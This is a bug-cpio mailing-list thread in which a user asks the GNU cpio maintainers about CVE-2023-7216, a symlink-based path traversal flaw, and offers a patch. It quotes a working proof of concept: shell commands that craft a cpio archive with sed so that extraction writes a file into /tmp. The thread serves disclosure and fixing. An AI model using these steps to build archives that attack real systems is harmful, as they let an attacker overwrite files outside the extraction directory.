bug-cpio
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re:Is there a fix for this CVE-2023-7216?

From: Peng
Subject: Re:Is there a fix for this CVE-2023-7216?
Date: Thu, 29 Feb 2024 19:02:57 +0800 
Dear cpio maintainer:

		

	This is a Red Hat Community Report on CVE-2023-7216:https://bugzilla.redhat.com/show_bug.cgi?id=2249901

	

	CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.

	

	Redhat CVE-2023-7216's Poc can be reproduced using the following method:

	```

	[root@localhost home]# mkdir testcpio

	[root@localhost home]# ln -sf /tmp/ testcpio/tmp

	[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt

	[root@localhost home]# cd  testcpio/

	[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio

	tmp

	tmpYtrav.txt

	1 block

	[root@localhost testcpio]# cd ..

	[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio

	[root@localhost home]# cpio -i < trav.cpio

	[root@localhost home]# cat /tmp/trav.txt

	TEST Traversal

	[root@localhost home]# cat tmp/trav.txt

	TEST Traversal

	```

	First of all, I would like to confirm with you, do you accept CVE-2023-7216? Is CVE-2023-7216 a bug or is it the default behavior of cpio software? 

	If CVE-2023-7216 is a bug, I try to provide a fix patch. Of course, if there is a better fix, please point it out.

	

	CVE-2023-7216 is similar to CVE-2015-1197,Both of them use symlink to cause Path Traversal.The CVE-2015-1197 fix uses symlink_placeholder () to fix a Path Traversal issue in the --no-absolute-filenames scenario.However, CVE-2023-7216 proves that path traversal also exists in other scenarios. 

	

	So I made a patch to fix CVE-2023-7216, copyin_link() should enable symlink_placeholder() by default, not only when the --no-absolute-filenames option is on.

	

	Look forward to your feedback and suggestions soon.

	

Best Regards,

Peng


------------------ Original ------------------
From: "2773414454" <2773414454@qq.com>;
Date: Tue, Feb 20, 2024 11:03 AM
To: "bug-cpio"<bug-cpio@gnu.org>;
Subject: Is there a fix for this CVE-2023-7216?

Dear cpio maintainer:

    https://nvd.nist.gov/vuln/detail/CVE-2023-7216

    NVD does not provide any related patch information.



    Is there a fix for cpio's CVE-2023-7216?

      [1] If not, what is the repair plan for cpio?

      [2] If yes, can you indicate which submissions fix CVE-2023-7216?

peng


Attachment: 0001-deafult-use-symlink_placeholder-to-fix-Path-Traversa.patch.txt
Description: Binary data

reply via email to
[Prev in Thread] Current Thread [Next in Thread]